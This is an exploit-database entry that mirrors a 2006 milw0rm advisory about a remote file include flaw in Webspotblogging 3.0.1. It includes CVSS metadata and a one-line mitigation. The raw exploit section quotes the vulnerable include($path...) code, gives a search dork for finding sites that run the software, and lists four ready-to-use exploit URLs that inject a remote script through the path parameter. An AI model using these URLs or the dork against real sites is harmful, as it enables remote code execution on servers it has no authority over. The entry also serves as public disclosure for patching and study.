header-logo
Suggest Exploit
vendor:
Webspotblogging
by:
Kacper (a.k.a Rahim)
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Webspotblogging
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:webspotblogging:webspotblogging:3.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability

Webspotblogging 3.0.1 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file include statement.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability
$$  Script site: http://blogging.webspot.co.uk/
$$  dork: Powered by WebspotBlogging
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
inc/logincheck.inc.php:
[code]
....
include($path."inc/footer.inc.php");
exit();
 }
....
[/code]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 And more verbs in
 inc/adminheader.inc.php
 inc/global.php
 inc/mainheader.inc.php
*/

Expl:

http://www.site.com/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
http://www.site.com/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
http://www.site.com/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
http://www.site.com/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]

#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-03]